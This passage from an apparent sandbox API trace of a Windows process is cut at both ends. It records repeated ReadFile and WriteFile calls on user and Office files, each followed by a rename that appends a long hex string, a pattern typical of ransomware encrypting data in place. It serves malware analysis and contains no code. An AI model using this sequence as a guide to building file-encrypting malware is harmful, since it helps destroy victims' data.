lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.254] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.255] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AD797E1FB7628BCEAFE48C0018BDD379730C62A14342B8124ACBADE299C80958" [0158.256] GetProcessHeap () returned 0x270000 [0158.256] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ae) returned 0x42f0540 [0158.256] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x723f8dc, FileInformation=0x42f0540, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0158.259] CloseHandle (hObject=0x5a0) returned 1 [0158.680] GetProcessHeap () returned 0x270000 [0158.681] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0158.681] RtlInterlockedCompareExchange64 () returned 0x1 [0158.682] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.707] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0158.707] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, 
lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.708] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0158.709] RtlInterlockedCompareExchange64 () returned 0x0 [0158.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0158.711] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0158.712] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A" [0158.712] GetProcessHeap () returned 0x270000 [0158.712] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1ae) returned 0x42f06f8 [0158.713] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42f06f8, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0158.723] CloseHandle (hObject=0x598) returned 1 [0159.212] GetProcessHeap () returned 0x270000 [0159.213] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.213] RtlInterlockedCompareExchange64 () returned 0x1 [0159.213] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.215] WriteFile (in: hFile=0x58c, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.221] RtlInterlockedCompareExchange64 () returned 0x0 [0159.221] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.450] ReadFile (in: hFile=0x5a8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x2e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.450] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.452] WriteFile (in: hFile=0x5a8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.455] RtlInterlockedCompareExchange64 () returned 0x2 [0159.455] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | 
out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.463] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.464] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", lpString2=".C1F0B128345E024A6DB34C051BE9564C0AAECEBBB24CA75F7D2D961032DCED51" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.C1F0B128345E024A6DB34C051BE9564C0AAECEBBB24CA75F7D2D961032DCED51") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.C1F0B128345E024A6DB34C051BE9564C0AAECEBBB24CA75F7D2D961032DCED51" [0159.464] GetProcessHeap () returned 0x270000 [0159.464] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x31e4c0 [0159.464] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x723f8dc, FileInformation=0x31e4c0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0159.465] CloseHandle (hObject=0x5a8) returned 1 [0159.469] GetProcessHeap () returned 0x270000 [0159.470] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.477] RtlInterlockedCompareExchange64 () returned 0x2 [0159.477] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.512] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 
[0159.513] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml", lpString2=".B562F956152CE858C941E95CCD23716DE27D690F682268A7CEDA95FDDF971F0C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.B562F956152CE858C941E95CCD23716DE27D690F682268A7CEDA95FDDF971F0C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.B562F956152CE858C941E95CCD23716DE27D690F682268A7CEDA95FDDF971F0C" [0159.513] GetProcessHeap () returned 0x270000 [0159.513] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7420080 [0159.514] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x7420080, Length=0x168, FileInformationClass=0xa) returned 0x0 [0159.519] CloseHandle (hObject=0x58c) returned 1 [0159.522] GetProcessHeap () returned 0x270000 [0159.523] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.523] RtlInterlockedCompareExchange64 () returned 0x1 [0159.523] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.527] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.527] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.528] WriteFile 
(in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.529] RtlInterlockedCompareExchange64 () returned 0x0 [0159.529] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.530] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.531] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml", lpString2=".2CFCDC1C71242AAE376E3C0A08C311ADB3965CB7408D7A6FCD7B30EE74EDA47F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.2CFCDC1C71242AAE376E3C0A08C311ADB3965CB7408D7A6FCD7B30EE74EDA47F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.2CFCDC1C71242AAE376E3C0A08C311ADB3965CB7408D7A6FCD7B30EE74EDA47F" [0159.531] GetProcessHeap () returned 0x270000 [0159.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b038 [0159.531] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x35b038, Length=0x158, FileInformationClass=0xa) returned 0x0 [0159.536] CloseHandle (hObject=0x58c) returned 1 [0159.540] GetProcessHeap () returned 0x270000 [0159.541] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.541] RtlInterlockedCompareExchange64 () returned 0x1 [0159.541] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.544] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.544] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.545] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.550] RtlInterlockedCompareExchange64 () returned 0x0 [0159.550] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.551] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.552] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml", lpString2=".FCE8DE785B81FF77D7E4C424C494F4B90733850F61FCAD92A62B64F1F6B7907A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.FCE8DE785B81FF77D7E4C424C494F4B90733850F61FCAD92A62B64F1F6B7907A") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.FCE8DE785B81FF77D7E4C424C494F4B90733850F61FCAD92A62B64F1F6B7907A" [0159.552] GetProcessHeap () returned 0x270000 [0159.552] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x342050 [0159.553] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x342050, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0159.554] CloseHandle (hObject=0x58c) returned 1 [0159.558] GetProcessHeap () returned 0x270000 [0159.560] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.560] RtlInterlockedCompareExchange64 () returned 0x1 [0159.560] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.600] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.600] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.601] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.603] RtlInterlockedCompareExchange64 () returned 0x0 [0159.603] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.604] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.605] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml", lpString2=".09C9FDD40F78A8542182D9528D88EDDF5DBE1EF686FDDA7BCB106EDA4C800230" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.09C9FDD40F78A8542182D9528D88EDDF5DBE1EF686FDDA7BCB106EDA4C800230") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.09C9FDD40F78A8542182D9528D88EDDF5DBE1EF686FDDA7BCB106EDA4C800230" [0159.605] GetProcessHeap () returned 0x270000 [0159.606] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b1a0 [0159.606] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x35b1a0, Length=0x158, FileInformationClass=0xa) returned 0x0 [0159.607] CloseHandle (hObject=0x590) returned 1 [0159.614] GetProcessHeap () returned 0x270000 [0159.615] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.616] RtlInterlockedCompareExchange64 () returned 0x1 [0159.616] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.619] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x74c2008) returned 1 [0159.619] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.620] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.621] RtlInterlockedCompareExchange64 () returned 0x0 [0159.621] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.625] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.626] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat", lpString2=".FD17D5AF9954089E6931E45BF39371984C08D3ABF9662576CAB5EB11BB59600F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat.FD17D5AF9954089E6931E45BF39371984C08D3ABF9662576CAB5EB11BB59600F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTeleMediumCost.dat.FD17D5AF9954089E6931E45BF39371984C08D3ABF9662576CAB5EB11BB59600F" [0159.626] GetProcessHeap () returned 0x270000 [0159.626] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x1da) returned 0x42f08b0 [0159.629] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x42f08b0, Length=0x1da, FileInformationClass=0xa) returned 0x0 [0159.631] CloseHandle (hObject=0x590) returned 1 [0159.634] GetProcessHeap () returned 0x270000 [0159.637] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.637] RtlInterlockedCompareExchange64 () returned 0x1 [0159.637] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.641] ReadFile (in: hFile=0x58c, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0159.641] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.643] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0159.644] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat", lpString2=".7A80E9DD773AC9B1CDB98DA617A80E62EF260B743B42F24409A47E8324462C71" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - 
OTeleMediumCost.dat.7A80E9DD773AC9B1CDB98DA617A80E62EF260B743B42F24409A47E8324462C71") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{2D5D3B0C-DC37-43DB-8B18-D419E1B30F6F} (0) - 2480 - powerpnt.exe - OTeleMediumCost.dat.7A80E9DD773AC9B1CDB98DA617A80E62EF260B743B42F24409A47E8324462C71" [0159.644] GetProcessHeap () returned 0x270000 [0159.644] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1dc) returned 0x741a1d0 [0159.644] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x723f8dc, FileInformation=0x741a1d0, Length=0x1dc, FileInformationClass=0xa) returned 0x0 [0159.649] CloseHandle (hObject=0x58c) returned 1 [0159.653] GetProcessHeap () returned 0x270000 [0159.655] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.655] RtlInterlockedCompareExchange64 () returned 0x1 [0159.655] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.665] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.666] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0159.668] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0159.669] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat", lpString2=".FE323FBCC26329F7660D9946FEE30DC24C9BAD08AD2C1003F94F3AF4E0DDED09" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat.FE323FBCC26329F7660D9946FEE30DC24C9BAD08AD2C1003F94F3AF4E0DDED09") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat.FE323FBCC26329F7660D9946FEE30DC24C9BAD08AD2C1003F94F3AF4E0DDED09" [0159.669] GetProcessHeap () returned 0x270000 [0159.669] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1d6) returned 0x42f0a98 [0159.669] NtSetInformationFile 